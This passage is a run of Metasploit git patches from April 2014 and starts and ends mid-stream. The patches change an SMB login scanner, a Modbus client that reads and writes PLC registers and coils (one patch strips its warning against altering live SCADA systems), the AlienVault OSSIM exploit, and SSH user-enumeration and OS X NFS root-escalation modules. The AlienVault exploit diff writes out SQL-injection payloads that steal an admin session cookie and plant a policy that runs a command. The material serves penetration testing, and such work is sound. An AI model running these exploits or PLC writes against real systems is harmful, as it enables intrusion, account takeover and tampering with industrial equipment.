method `error_reason' for # This changes uses the built in method get_error to return an error code. [-] x.x.x.x:445 SMB - [1/1] - \\Domain - FAILED LOGIN (xxxxxxxx) xxxx : xxxxx [STATUS_WAIT_0] --- modules/auxiliary/scanner/smb/smb_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 0d7daddb69..33a34b629e 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Rex::Proto::SMB::Exceptions::LoginError => e status_code = e.error_reason rescue ::Rex::Proto::SMB::Exceptions::InvalidWordCount => e - status_code = e.error_reason + status_code = e.get_error(e.error_code) rescue ::Rex::Proto::SMB::Exceptions::NoReply ensure disconnect() From a2ccbf9833e8ffebfac80e133f31089bdd740c32 Mon Sep 17 00:00:00 2001 From: Arnaud SOULLIE Date: Mon, 28 Apr 2014 15:29:55 +0200 Subject: [PATCH 179/853] Add read/write capabilities to modbusclient --- .../auxiliary/scanner/scada/modbusclient.rb | 187 ++++++++++++------ 1 file changed, 132 insertions(+), 55 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index bd4f6ab6fe..64293b63ee 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -8,74 +8,151 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Fuzzer + include Rex::Socket::Tcp def initialize(info = {}) super(update_info(info, - 'Name' => 'Modbus Client Utility', - 'Description' => %q{ - This module sends a command (0x06, write to one register) to a Modbus endpoint. - You can change port, IP, register to write and data to write, as well as unit-id. + 'Name' => 'Modbus client, reloaded.', + 'Description' => %q{ + This module allows reading and writing data to a PLC using the Modbus protocol. - Modbus is a clear text protocol used in common SCADA systems, developed - originally as a serial-line (RS232) async protocol. It is later transformed - to IP, which is called ModbusTCP. - - There are a handful of functions which are possible to do, but this - client has only implemented the function "write value to register" (\x48). + This module is based on the 'modiconstop.rb' Basecamp module from + DigitalBond, as well as the mbtget perl script. }, - 'Author' => [ 'EsMnemon ' ], - 'References' => + 'Author' => [ - ['URL', 'http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx'] + 'EsMnemon ', # original write-only module + 'Arnaud SOULLIE ', # new code that allows read/write ], 'License' => MSF_LICENSE, - 'DisclosureDate' => 'Nov 1 2011' - )) + )) + register_options( + [ + OptEnum.new("MODE", [true, 'Command', "READ_REGISTER", + [ + "READ_REGISTER", + "READ_COIL", + "WRITE_REGISTER", + "WRITE_COIL" + ] + ]), + Opt::RPORT(502), + OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)", 0xBEEF]), + OptInt.new('DATA_ADDRESS', [true, "Modbus data address", 0]), + OptInt.new('UNIT_NUMBER', [false, "Modbus unit number (255 if not used)", 255]), + ], self.class) - register_options([ - Opt::RPORT(502), - OptInt.new('UNIT_ID', [true, "ModBus Unit Identifier ", 1]), - OptInt.new('MODVALUE', [true, "ModBus value to write (data) ", 2]), - OptInt.new('REGIS', [true, "ModBus Register definition", 1002]) - ], self.class) + end + + # Don't mess with live production SCADA systems + def scada_write_warning + print_status("Warning : do not try to alter live SCADA configuration. Bad shit can happened. Continue ? (y/n)") + go_on = gets + unless go_on.chomp == 'y' + print_error("Stopping module") + exit + end + end + + # a wrapper just to be sure we increment the counter + def sendframe(payload) + sock.put(payload) + @modbuscounter += 1 + r = sock.recv(65535, 0.1) + return r + end + + def make_read_payload + payload = "" + payload += [datastore['UNIT_NUMBER']].pack("c") + payload += [@function_code].pack("c") + payload += [datastore['DATA_ADDRESS']].pack("n") + payload += [1].pack("n") + + packetdata = "" + packetdata += [@modbuscounter].pack("n") + packetdata += "\x00\x00\x00" #dunno what these are + packetdata += [payload.size].pack("c") # size byte + packetdata += payload + + return packetdata + end + + def make_write_coil_payload(data) + payload = "" + payload += [datastore['UNIT_NUMBER']].pack("c") + payload += [@function_code].pack("c") + payload += [datastore['DATA_ADDRESS']].pack("n") + payload += [data].pack("c") + payload += "\x00" + + packetdata = "" + packetdata += [@modbuscounter].pack("n") + packetdata += "\x00\x00\x00" #dunno what these are + packetdata += [payload.size].pack("c") # size byte + packetdata += payload + + return packetdata + end + + def make_write_register_payload(data) + payload = "" + payload += [datastore['UNIT_NUMBER']].pack("c") + payload += [@function_code].pack("c") + payload += [datastore['DATA_ADDRESS']].pack("n") + payload += [data].pack("n") + + packetdata = "" + packetdata += [@modbuscounter].pack("n") + packetdata += "\x00\x00\x00" #dunno what these are + packetdata += [payload.size].pack("c") # size byte + packetdata += payload + + return packetdata end def run - trans_id ="\x21\x00" - proto_id ="\x00\x00" - len ="\x00\x06" - func_id ="\x06" + @modbuscounter = 0x0000 # used for modbus frames + connect + case datastore['MODE'] + when "READ_COIL" + @function_code = 1 + response = sendframe(make_read_payload) + print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) - #For debug: MODVALUE=19276 REGIS=18762, UNIT_ID=71 - #trans_id="\x41\x42" - #proto_id="\x43\x44" - #len="\x45\x46" - #func_id="\x48" + when "READ_REGISTER" + @function_code = 3 + response = sendframe(make_read_payload) + value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') + print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) - sploit = trans_id - sploit += proto_id - sploit += len - sploit += [datastore['UNIT_ID']].pack("C") - sploit += func_id - sploit += [datastore['REGIS']].pack("S").reverse - sploit += [datastore['MODVALUE']].pack("S").reverse + when "WRITE_COIL" + scada_write_warning + @function_code = 5 + if datastore['DATA'] == 0 + data = 0 + elsif datastore['DATA'] == 1 + data = 255 + else + print_error("Data value must be 0 or 1 in WRITE_COIL mode") + exit + end + response = sendframe(make_write_coil_payload(data)) + print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") - connect() - sock.put(sploit) - sock.get_once - disconnect() + when "WRITE_REGISTER" + scada_write_warning + @function_code = 6 + if datastore['DATA'] < 0 || datastore['DATA'] > 65535 + print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode") + exit + end + response = sendframe(make_write_register_payload(datastore['DATA'])) + print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") + + else + print_error("Invalid MODE") + return + end end -end - - -=begin -MODBUS: 10 00 00 00 00 06 01 06 03 ea 00 02 -tested on a SAIA PCD1.M2 -scapy - even with source-IP - sploit="\x21\x00\x00\x00\x00\x06\x01\x06\x03\xea\x00\x02" - ip=IP(dst="172.16.10.10",src="172.16.10.155",proto=6,flags=2) - tcp=TCP(dport=509) - send(ip/tcp/sploit) - -=end +end \ No newline at end of file From ab913a533e512b8b247cc4f422e8c06734ef0df7 Mon Sep 17 00:00:00 2001 From: Pedro Laguna Date: Mon, 28 Apr 2014 14:36:48 +0100 Subject: [PATCH 180/853] Update oracle_demantra_file_retrieval.rb Fixed typo --- .../auxiliary/scanner/http/oracle_demantra_file_retrieval.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb index 6a71e8a8ea..0883e3e6e5 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle Demantra Arbitrary File Retrieval with Authentication Bypass', 'Description' => %q{ - This module exploits a file downlad vulnerability found in Oracle + This module exploits a file download vulnerability found in Oracle Demantra 12.2.1 in combination with an authentication bypass. By combining these exposures, an unauthenticated user can retreive any file on the system by referencing the full file path to any file a vulnerable From a0add34a7d961b5ff6438e9b0f7bfd363927ed0b Mon Sep 17 00:00:00 2001 From: Arnaud SOULLIE Date: Mon, 28 Apr 2014 15:47:10 +0200 Subject: [PATCH 181/853] Removed warning message and changed default unit number to 1 --- modules/auxiliary/scanner/scada/modbusclient.rb | 14 +------------- 1 file changed, 1 insertion(+), 13 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index 64293b63ee..e5b2bf0f2d 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -39,21 +39,11 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(502), OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)", 0xBEEF]), OptInt.new('DATA_ADDRESS', [true, "Modbus data address", 0]), - OptInt.new('UNIT_NUMBER', [false, "Modbus unit number (255 if not used)", 255]), + OptInt.new('UNIT_NUMBER', [false, "Modbus unit number", 1]), ], self.class) end - # Don't mess with live production SCADA systems - def scada_write_warning - print_status("Warning : do not try to alter live SCADA configuration. Bad shit can happened. Continue ? (y/n)") - go_on = gets - unless go_on.chomp == 'y' - print_error("Stopping module") - exit - end - end - # a wrapper just to be sure we increment the counter def sendframe(payload) sock.put(payload) @@ -127,7 +117,6 @@ class Metasploit3 < Msf::Auxiliary print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) when "WRITE_COIL" - scada_write_warning @function_code = 5 if datastore['DATA'] == 0 data = 0 @@ -141,7 +130,6 @@ class Metasploit3 < Msf::Auxiliary print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") when "WRITE_REGISTER" - scada_write_warning @function_code = 6 if datastore['DATA'] < 0 || datastore['DATA'] > 65535 print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode") From 245b59124727210386920bc3fecc40367e8db8d2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 28 Apr 2014 11:45:40 -0500 Subject: [PATCH 182/853] Do module clean up --- .../unix/webapp/alienvault_sqli_exec.rb | 182 +++++++++--------- 1 file changed, 92 insertions(+), 90 deletions(-) diff --git a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb index 8c7653c8a5..f3bfa8a513 100644 --- a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb +++ b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb @@ -27,12 +27,14 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ + ['OSVDB', '106252'], + ['EDB', '33006'] ], 'DefaultOptions' => { 'SSL' => true }, - 'Platform' => ['unix'], + 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { @@ -43,10 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - ['Alienvault OSSIM', {}] + ['Alienvault OSSIM 4.3', {}] ], 'Privileged' => true, - 'DisclosureDate' => "Apr 28 2014", + 'DisclosureDate' => "Apr 24 2014", 'DefaultTarget' => 0)) register_options( @@ -58,22 +60,20 @@ class Metasploit3 < Msf::Exploit::Remote def check - # Check version - vprint_status("#{peer} - Trying to detect vulnerable OSSIM") - marker = rand_text_alpha(6) - sqlirand = rand_text_numeric(4+rand(4)) + sqli_rand = rand_text_numeric(4+rand(4)) sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) " - sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1" + sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), 'vars_get' => { 'date_from' => sqli } }) - if res and res.code == 200 and res.body =~ /#{marker}726F6F74403132372E302E302E31#{marker}/ # 726F6F74403132372E302E302E31 = root@127.0.0.1 + if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root return Exploit::CheckCode::Vulnerable else + print_status("#{res.body}") return Exploit::CheckCode::Safe end @@ -82,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote def exploit marker = rand_text_alpha(6) - sqlirand = rand_text_numeric(4+rand(4)) + sqli_rand = rand_text_numeric(4+rand(4)) sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " - sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqlirand}'='#{sqlirand}" + sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" print_status("#{peer} - Trying to grab admin session through SQLi") @@ -93,9 +93,9 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_get' => { 'date_from' => sqli } }) - if res and res.code == 200 and res.body =~ /#{marker}(.*)#{marker}/ - adminsession = $1 - @cookie = "PHPSESSID=" + ["#{adminsession}"].pack("H*") + if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/ + admin_session = $1 + @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*") print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") else fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") @@ -118,24 +118,26 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 + if res && res.code == 200 print_status("#{peer} - Created Action [ #{action} ]") else fail_with(Failure::Unknown, "#{peer} - Action creation failed!") end - # Retrieving the Action ID, used to clean up the action after succesful exploitation - post_vars = "page=1&rp=2000" + # Retrieving the Action ID, used to clean up the action after successful exploitation res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"), 'cookie' => @cookie, - 'data' => post_vars + 'vars_post' => { + 'page' => '1', + 'rp' => '2000' + } }) - if res and res.code == 200 and res.body =~ /actionform.php\?id=(.*)'>#{action}/ - @actionid = $1 - print_status("#{peer} - Action ID is [ #{@actionid} ]") + if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/ + @action_id = $1 + print_status("#{peer} - Action ID is [ #{@action_id} ]") else fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") end @@ -143,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieving the policy data, necessary for proper cleanup after succesful exploitation res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "policy.php"), + 'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"), 'cookie' => @cookie, 'vars_get' => { 'm_opt' => 'configuration', @@ -152,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 and res.body =~ /getpolicy.php\?ctx=(.*)\&group=(.*)',/ - policyctx = $1 - policygroup = $2 - print_status("#{peer} - Policy data [ ctx=#{policyctx} ] and [ group=#{policygroup} ] retrieved!") + if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/ + policy_ctx = $1 + policy_group = $2 + print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") end @@ -169,8 +171,8 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => { 'descr' => policy, 'active' => '1', - 'group' => policygroup, - 'ctx' => policyctx, + 'group' => policy_group, + 'ctx' => policy_ctx, 'order' => '1', # Makes this the first policy, overruling all the other policies 'action' => 'new', 'sources[]' => '00000000000000000000000000000000', # Source is ANY @@ -201,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote 'end_day_week' => '7', 'end_day_month' => '31', 'end_month' => '12', - 'actions[]' => @actionid, + 'actions[]' => @action_id, 'sim' => '1', 'priority' => '1', 'qualify' => '1', @@ -211,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 + if res && res.code == 200 print_status("#{peer} - Created Policy [ #{policy} ]") else fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") @@ -223,23 +225,22 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"), 'cookie' => @cookie, 'vars_get' => { - 'ctx' => policyctx, - 'group' => policygroup + 'ctx' => policy_ctx, + 'group' => policy_group }, 'vars_post' => { 'page' => '1', 'rp' => '2000' } }) - if res and res.code == 200 and res.body =~ /row id='(.*)' col_order='1'/ - @policyid = $1 - print_status("#{peer} - Policy ID [ #{@policyid} ] retrieved!") + if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/ + @policy_id = $1 + print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") end # Reload the policies to make our new policy active - policy = rand_text_alpha(8) print_status("#{peer} - Reloading Policies") res = send_request_cgi({ 'method' => 'GET', @@ -251,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 + if res && res.code == 200 print_status("#{peer} - Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") @@ -259,15 +260,15 @@ class Metasploit3 < Msf::Exploit::Remote # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. - dontexist = rand_text_alpha(8+rand(4)) + dont_exist = rand_text_alpha(8+rand(4)) print_status("#{peer} - Triggering policy and action by requesting a non existing url") res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, dontexist), + 'uri' => normalize_uri(target_uri.path, dont_exist), 'cookie' => @cookie }) - if res and res.code == 404 + if res && res.code == 404 print_status("#{peer} - Payload delivered") else fail_with(Failure::Unknown, "#{peer} - Payload failed!") @@ -277,58 +278,59 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup - # Clean up, retrieve token so that the policy can be removed - print_status("#{peer} - Cleaning up") - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), - 'cookie' => @cookie, - 'vars_post' => { 'f_name' => 'delete_policy' } - }) + begin + # Clean up, retrieve token so that the policy can be removed + print_status("#{peer} - Cleaning up") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), + 'cookie' => @cookie, + 'vars_post' => { 'f_name' => 'delete_policy' } + }) - if res and res.code == 200 and res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ - token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") - else - print_warning("#{peer} - Unable to retrieve token") + if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ + token = $1 + print_status("#{peer} - Token [ #{token} ] retrieved") + else + print_warning("#{peer} - Unable to retrieve token") + end + + # Remove our policy + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'confirm' => 'yes', + 'id' => @policy_id, + 'token' => token + } + }) + + if res && res.code == 200 + print_status("#{peer} - Policy ID [ #{@policy_id} ] removed") + else + print_warning("#{peer} - Unable to remove Policy ID") + end + + # Remove our action + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'id' => @action_id, + } + }) + + if res && res.code == 200 + print_status("#{peer} - Action ID [ #{@action_id} ] removed") + else + print_warning("#{peer} - Unable to remove Action ID") + end + ensure + super # mixins should be able to cleanup even in case of Exception end - - # Remove our policy - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"), - 'cookie' => @cookie, - 'vars_get' => { - 'confirm' => 'yes', - 'id' => @policyid, - 'token' => token - } - }) - - if res and res.code == 200 - token = $1 - print_status("#{peer} - Policy ID [ #{@policyid} ] removed") - else - print_warning("#{peer} - Unable to remove Policy ID") - end - - # Remove our action - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"), - 'cookie' => @cookie, - 'vars_get' => { - 'id' => @actionid, - } - }) - - if res and res.code == 200 - token = $1 - print_status("#{peer} - Action ID [ #{@actionid} ] removed") - else - print_warning("#{peer} - Unable to remove Action ID") - end - end end From 887dfc5f4028bc7c614e6c4ef12601ab641d9402 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 28 Apr 2014 11:54:56 -0500 Subject: [PATCH 183/853] Fix RequiredCmd --- modules/exploits/unix/webapp/alienvault_sqli_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb index f3bfa8a513..43a4f1574e 100644 --- a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb +++ b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Compat' => { - 'RequiredCmd' => 'generic perl ruby python bash', + 'RequiredCmd' => 'generic perl pythonR', } }, 'Targets' => From 51a5a901a8438ea209e8a391f2498c718676627c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 28 Apr 2014 11:55:06 -0500 Subject: [PATCH 184/853] Fix typo --- modules/exploits/unix/webapp/alienvault_sqli_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb index 43a4f1574e..e22c6b0cc6 100644 --- a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb +++ b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Compat' => { - 'RequiredCmd' => 'generic perl pythonR', + 'RequiredCmd' => 'generic perl python', } }, 'Targets' => From 9a1b216fdb6c3e33580f39513ea228f6b0c4c188 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 28 Apr 2014 11:55:26 -0500 Subject: [PATCH 185/853] Move module to new location --- .../exploits/{unix/webapp => linux/http}/alienvault_sqli_exec.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/{unix/webapp => linux/http}/alienvault_sqli_exec.rb (100%) diff --git a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb similarity index 100% rename from modules/exploits/unix/webapp/alienvault_sqli_exec.rb rename to modules/exploits/linux/http/alienvault_sqli_exec.rb From a7e110be9e73cb78dea605faa50683b8572e1417 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 28 Apr 2014 19:36:45 +0100 Subject: [PATCH 186/853] Add a peer method, elaborate desc and prints --- .../auxiliary/scanner/ssh/ssh_enumusers.rb | 28 ++++++++++++++----- 1 file changed, 21 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 834494d700..811f067456 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -17,11 +17,15 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'SSH Username Enumeration', 'Description' => %q{ This module uses a time-based attack to enumerate users in a OpenSSH server. + On some versions of OpenSSH under some configurations, OpenSSH will prompt + for a password for an invalid user faster than for a valid user. }, 'Author' => ['kenkeiras'], 'References' => [ - ['CVE', '2006-5229'] + ['CVE', '2006-5229'], + ['OSVDB', '32721'], + ['BID', '20418'] ], 'License' => MSF_LICENSE )) @@ -115,8 +119,18 @@ class Metasploit3 < Msf::Auxiliary ) end + # Because this isn't using the AuthBrute mixin, we don't have the + # usual peer method + def peer(rhost=nil) + "#{rhost}:#{rport} - SSH -" + end + def user_list - File.new(datastore['USER_FILE']).read.split + if File.readable? datastore['USER_FILE'] + File.new(datastore['USER_FILE']).read.split + else + raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}" + end end def attempt_user(user, ip) @@ -126,7 +140,7 @@ class Metasploit3 < Msf::Auxiliary while attempt_num <= retry_num and (ret.nil? or ret == :connection_error) if attempt_num > 0 Rex.sleep(2 ** attempt_num) - print_debug "Retrying '#{user}' on '#{ip}' due to connection error" + print_debug "#{peer(ip)} Retrying '#{user}' due to connection error" end ret = check_user(ip, user, rport) @@ -139,17 +153,17 @@ class Metasploit3 < Msf::Auxiliary def show_result(attempt_result, user, ip) case attempt_result when :success - print_good "User '#{user}' found on #{ip}" + print_good "#{peer(ip)} User '#{user}' found" do_report(ip, user, rport) when :connection_error - print_error "User '#{user}' on #{ip} could not connect" + print_error "#{peer(ip)} User '#{user}' on could not connect" when :fail - print_debug "User '#{user}' not found on #{ip}" + print_debug "#{peer(ip)} User '#{user}' not found" end end def run_host(ip) - print_status "Starting scan on #{ip}" + print_status "#{peer(ip)} Starting scan" user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } end From a6edd94c7f3c0c22adcb90e7a5e3bd7b0743d3ac Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 28 Apr 2014 19:47:15 +0100 Subject: [PATCH 187/853] Just fix refs and desc for release --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 834494d700..d919b82f1a 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -17,12 +17,16 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'SSH Username Enumeration', 'Description' => %q{ This module uses a time-based attack to enumerate users in a OpenSSH server. - }, - 'Author' => ['kenkeiras'], - 'References' => - [ - ['CVE', '2006-5229'] - ], + On some versions of OpenSSH under some configurations, OpenSSH will prompt + for a password for an invalid user faster than for a valid user. + }, + 'Author' => ['kenkeiras'], + 'References' => + [ + ['CVE', '2006-5229'], + ['OSVDB', '32721'], + ['BID', '20418'] + ], 'License' => MSF_LICENSE )) From a5baea1a8e3db69db5e5f7fe679a109451304843 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 28 Apr 2014 19:49:23 +0100 Subject: [PATCH 188/853] Touch up print_ statements --- modules/exploits/osx/local/nfs_mount_root.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb index 7ab4242f50..b6c750493c 100644 --- a/modules/exploits/osx/local/nfs_mount_root.rb +++ b/modules/exploits/osx/local/nfs_mount_root.rb @@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Local 'Description' => %q{ This exploit leverage a stack overflow vulnerability to escalate privileges. The vulnerable function nfs_convert_old_nfs_args does not verify the size - of a user-provided argument before copying it to the stack. As a result by - passing a large size, a local user can overwrite the stack with arbitrary + of a user-provided argument before copying it to the stack. As a result, by + passing a large size as an argument, a local user can overwrite the stack with arbitrary content. Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected. @@ -67,11 +67,11 @@ class Metasploit3 < Msf::Exploit::Local tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" - print_status "Writing temp file... #{tmpfile}" + print_status "Writing temp file as '#{tmpfile}'" write_file(tmpfile, exploit) register_file_for_cleanup(tmpfile) - print_status "Writing payload file... #{payloadfile}" + print_status "Writing payload file as '#{payloadfile}'" write_file(payloadfile, pload) register_file_for_cleanup(payloadfile) From 3bfdfb5cab60357b8c8d6d4dc1d58fe11b611bd1 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 28 Apr 2014 19:49:56 +0100 Subject: [PATCH 189/853] Grammar --- modules/exploits/osx/local/nfs_mount_root.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb index b6c750493c..1a68c1d0ba 100644 --- a/modules/exploits/osx/local/nfs_mount_root.rb +++ b/modules/exploits/osx/local/nfs_mount_root.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Local super(update_info(info, 'Name' => 'Mac OS X NFS Mount Privilege Escalation Exploit', 'Description' => %q{ - This exploit leverage a stack overflow vulnerability to escalate privileges. + This exploit leverages a stack overflow vulnerability to escalate privileges. The vulnerable function nfs_convert_old_nfs_args does not verify the size of a user-provided argument before copying it to the stack. As a result, by passing a large size as an argument, a local user can overwrite the stack with arbitrary From 1b4fe90003736ec1e68fda719c8e60a1ee82872f Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 28 Apr 2014 19:51:38 +0100 Subject: [PATCH 190/853] Fix msftidy warnings on wireshark exploits --- 